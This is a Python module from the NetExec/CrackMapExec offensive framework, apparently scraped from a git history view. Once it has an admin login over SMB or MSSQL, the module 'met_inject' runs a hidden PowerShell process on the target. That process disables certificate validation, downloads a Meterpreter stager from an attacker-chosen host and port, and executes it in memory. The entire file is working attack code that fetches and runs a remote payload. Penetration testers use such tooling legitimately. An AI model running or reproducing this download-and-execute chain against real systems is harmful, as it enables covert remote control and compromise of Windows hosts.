NetExec/cme/modules/met_inject.py

57 lines
2.5 KiB
Python
Raw Normal View History

2017-04-03 15:25:05 +00:00
from cme.helpers.powershell import *
2017-03-27 21:09:36 +00:00
from sys import exit
class CMEModule:
'''
Downloads the Meterpreter stager and injects it into memory using PowerSploit's Invoke-Shellcode.ps1 script
Module by @byt3bl33d3r
'''
name = 'met_inject'
description = "Downloads the Meterpreter stager and injects it into memory"
supported_protocols = ['smb', 'mssql']
opsec_safe = True
multiple_hosts = True
def options(self, context, module_options):
'''
SRVHOST IP hosting of the stager server
SRVPORT Stager port
RAND Random string given by metasploit
SSL Stager server use https or http (default: https)
2017-03-27 21:09:36 +00:00
'''
self.met_ssl = 'https'
2017-03-27 21:09:36 +00:00
if not 'SRVHOST' in module_options or not 'SRVPORT' in module_options or not 'RAND' in module_options:
context.log.error('SRVHOST and SRVPORT and RAND options are required!')
2017-03-27 21:09:36 +00:00
exit(1)
if 'SSL' in module_options:
self.met_ssl = module_options['SSL']
2017-03-27 21:09:36 +00:00
self.srvhost = module_options['SRVHOST']
self.srvport = module_options['SRVPORT']
self.rand = module_options['RAND']
2017-03-27 21:09:36 +00:00
def on_admin_login(self, context, connection):
# stolen from https://github.com/jaredhaight/Invoke-MetasploitPayload
command = """$url="{}://{}:{}/{}"
$DownloadCradle ='[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {{$true}};$client = New-Object Net.WebClient;$client.Proxy=[Net.WebRequest]::GetSystemWebProxy();$client.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;Invoke-Expression $client.downloadstring('''+$url+'''");'
$PowershellExe=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\powershell.exe'
if([Environment]::Is64BitProcess) {{ $PowershellExe='powershell.exe'}}
$ProcessInfo = New-Object System.Diagnostics.ProcessStartInfo
$ProcessInfo.FileName=$PowershellExe
$ProcessInfo.Arguments="-nop -c $DownloadCradle"
$ProcessInfo.UseShellExecute = $False
$ProcessInfo.RedirectStandardOutput = $True
$ProcessInfo.CreateNoWindow = $True
$ProcessInfo.WindowStyle = "Hidden"
$Process = [System.Diagnostics.Process]::Start($ProcessInfo)""".format(
'http' if self.met_ssl == 'http' else 'https',
self.srvhost,
self.srvport,
self.rand)
context.log.debug(command)
connection.ps_execute(command, force_ps32=True)
2017-03-27 21:09:36 +00:00
context.log.success('Executed payload')